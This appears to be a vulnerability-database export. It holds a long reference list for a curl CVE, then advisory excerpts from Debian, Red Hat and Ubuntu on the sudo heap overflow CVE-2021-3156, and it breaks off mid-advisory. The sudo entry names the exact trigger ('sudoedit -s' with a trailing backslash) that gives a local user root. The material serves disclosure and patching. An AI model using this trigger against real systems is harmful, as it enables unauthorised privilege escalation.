        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-27645"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-33574"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-35942"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-3712"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-20266"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27645"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-14145"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3521"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3778"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3796"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-43527"
      },
      {
        "trust": 0.2,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-40346"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-24407"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-39241"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33574"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-37750"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8231"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/curl"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8285"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8286"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8169"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22890"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-25013"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35524"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:5129"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-25014"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-25012"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35521"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35524"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-37136"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-17541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36331"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-31535"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36332"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-37137"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20317"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21409"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43267"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3481"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-25009"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-25010"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35523"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36331"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36330"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35521"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4511"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23434"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0185"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22942"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0466"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3564"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25710"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0920"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4122"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25710"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0466"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23434"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4155"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0856"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25214"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25709"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3752"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25709"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4019"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4192"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0155"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3984"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3573"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4193"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25214"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-0920"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3872"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-36084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23219"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1081"
      },
      {
        "trust": 0.1,
        "url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3999"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-31566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23308"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3521"
      },
      {
        "trust": 0.1,
        "url": "https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9."
      },
      {
        "trust": 0.1,
        "url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/."
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43565"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23806"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0580"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4658"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24348"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44790"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4845"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20095"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28493"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-42771"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26301"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26301"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28957"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8037"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8037"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20095"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28493"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33938"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3757"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33930"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33928"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4848"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22947"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3948"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20673"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3733"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33929"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36222"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3620"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22946"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/latest/distr_tracing/distr_tracing_install/distr-tracing-updating.html"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/latest/distr_tracing/distributed-tracing-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0318"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29923"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36221"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29923"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3426"
      }
    ],
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "169015"
      },
      {
        "db": "PACKETSTORM",
        "id": "165288"
      },
      {
        "db": "PACKETSTORM",
        "id": "164886"
      },
      {
        "db": "PACKETSTORM",
        "id": "166309"
      },
      {
        "db": "PACKETSTORM",
        "id": "166489"
      },
      {
        "db": "PACKETSTORM",
        "id": "166051"
      },
      {
        "db": "PACKETSTORM",
        "id": "165096"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      },
      {
        "db": "PACKETSTORM",
        "id": "165758"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22876"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22876",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "169015",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "165288",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "164886",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "166309",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "166489",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "166051",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "165096",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "165099",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "165758",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22876",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2021-04-01T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-22876",
        "ident": null
      },
      {
        "date": "2021-03-28T19:12:00",
        "db": "PACKETSTORM",
        "id": "169015",
        "ident": null
      },
      {
        "date": "2021-12-15T15:22:36",
        "db": "PACKETSTORM",
        "id": "165288",
        "ident": null
      },
      {
        "date": "2021-11-10T17:12:32",
        "db": "PACKETSTORM",
        "id": "164886",
        "ident": null
      },
      {
        "date": "2022-03-15T15:44:21",
        "db": "PACKETSTORM",
        "id": "166309",
        "ident": null
      },
      {
        "date": "2022-03-28T15:52:16",
        "db": "PACKETSTORM",
        "id": "166489",
        "ident": null
      },
      {
        "date": "2022-02-18T16:37:39",
        "db": "PACKETSTORM",
        "id": "166051",
        "ident": null
      },
      {
        "date": "2021-11-29T18:12:32",
        "db": "PACKETSTORM",
        "id": "165096",
        "ident": null
      },
      {
        "date": "2021-11-30T14:44:48",
        "db": "PACKETSTORM",
        "id": "165099",
        "ident": null
      },
      {
        "date": "2022-01-28T14:33:13",
        "db": "PACKETSTORM",
        "id": "165758",
        "ident": null
      },
      {
        "date": "2021-04-01T18:15:12.823000",
        "db": "NVD",
        "id": "CVE-2021-22876",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-22876",
        "ident": null
      },
      {
        "date": "2025-06-09T15:15:23.067000",
        "db": "NVD",
        "id": "CVE-2021-22876",
        "ident": null
      }
    ]
  },
  "title": {
    "_id": null,
    "data": "Debian Security Advisory 4881-1",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "169015"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "_id": null,
    "data": "code execution",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "165288"
      },
      {
        "db": "PACKETSTORM",
        "id": "165096"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      }
    ],
    "trust": 0.3
  }
}

VAR-202101-1926

Vulnerability from variot - Updated: 2026-03-09 22:27

Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character. A heap-based overflow has been discovered in the set_cmd() function in sudo, which may allow a local attacker to execute commands with elevated administrator privileges.CVE-2021-3156 AffectedCVE-2021-3156 Affected. Any local user (sudoers and non-sudoers) can exploit this flaw for root privilege escalation.

For the stable distribution (buster), this problem has been fixed in version 1.8.27-1+deb10u3.

We recommend that you upgrade your sudo packages.

For the detailed security status of sudo please refer to its security tracker page at: https://security-tracker.debian.org/tracker/sudo

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmAQWctfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Qr2w/5AfAZMSbKestTzvm22w+T5yReGOd2jYXO2SzdqdkIzOVXJ83RrbogkiyK d1ie47Csw51M8L5eT/kf48vkABPqT9S0dlRI7rQ2xbIDWIUcDpnFNCSclSGjI+Sd HqtaQQbR+MdSjGtC8vc8RVEOEQcVvoXrqDPaEniWjA4uTV7Iqj0P3EpH1XolVlZv lw4ZZ+VdDolxhm1QWp/NiMKUlDpv5RLs6jW0oQAKP1RZqMIX44TSEHil/NEs6VeN u5AFUwo5iwYRCUbgi2mB0GxV4CRyb0IN26pGsltYJsReFL1vCMiO9drGMk/WhlqB NGKeF5rLsMKaJCkBEcMntDG1XtFhXuyak2O4atL7H8CwhBZ81Axe+aAynn7IB99B qx3GLfRNSVKHQHBHWEOxqILCS+xWmvL6/uB6xMaAh5CXxhEgs9BIEiPonccmkzQ9 xj6Uw/aWv9ZOUu+Rwmp+bG/V8DKaFKegaQAy0HnhOZ11ruJJB/YicTXSsbxoLSEt hbd0bYAOrZBqcysH8Ed+R2tGxtjoWIDLcv3uUqmttxgd8E5YpGGngaYBleGCnB0s X3JDyd1pvBu7H0vR5k2bVNgm4qQ27jHmeNKRSpvUZv50mRX8NQyv/rrROwkUsVdI 1EnlHYz0E4BUfb15ECWLfN9BM/MyPhkdKadIrrd+zJEwq+KVcHo= =d9gQ -----END PGP SIGNATURE----- . Relevant releases/architectures:

RHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64 Red Hat Virtualization 4 Hypervisor for RHEL 8 - noarch, x86_64 Red Hat Virtualization 4 Management Agent for RHEL 7 Hosts - noarch

These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

Bug Fix(es):

Previously, the Red Hat Virtualization Host (RHV-H) repository (rhvh-4-for-rhel-8-x86_64-rpms) did not include the libsmbclient package, which is a dependency for the sssd-ad package. Consequently, the sssd-ad package failed to install.

With this update, the libsmbclient is now in the RHV-H repository, and sssd-ad now installs on RHV-H. (BZ#1868967)

Bugs fixed (https://bugzilla.redhat.com/):

1850939 - Hosted engine deployment does not properly show iSCSI LUN errors 1868967 - sssd-ad installation fails on RHV-H 4.4 due to missing libsmbclient from samba package in rhvh-4-for-rhel-8-x86_64-rpms channel 1889686 - CVE-2020-25684 dnsmasq: loose address/port check in reply_query() makes forging replies easier for an off-path attacker 1889688 - CVE-2020-25685 dnsmasq: loose query name check in reply_query() makes forging replies easier for an off-path attacker 1890125 - CVE-2020-25686 dnsmasq: multiple queries forwarded for the same name makes forging replies easier for an off-path attacker 1902315 - Rebase RHV-H 4.4 to RHV 4.4.4 1902646 - ssh connection fails due to overly permissive openssh.config file permissions 1909644 - HE deploy failed with "Failed to download metadata for repo 'rhel-8-for-x86_64-baseos-beta-rpms': Cannot download repomd.xml 1917684 - CVE-2021-3156 sudo: Heap buffer overflow in argument parsing 1921553 - RHVH upgrade to the latest 4.4.4-1 build will fail due to FileNotFoundError 1923126 - Hosted Engine setup fails on storage selection - Retrieval of iSCSI targets failed. 8.1) - aarch64, ppc64le, s390x, x86_64

6 ELS) - i386, s390x, x86_64
========================================================================== Ubuntu Security Notice USN-4705-2 January 27, 2021

sudo vulnerability

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 14.04 ESM
Ubuntu 12.04 ESM

Summary:

Several security issues were fixed in Sudo. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.

Original advisory details:

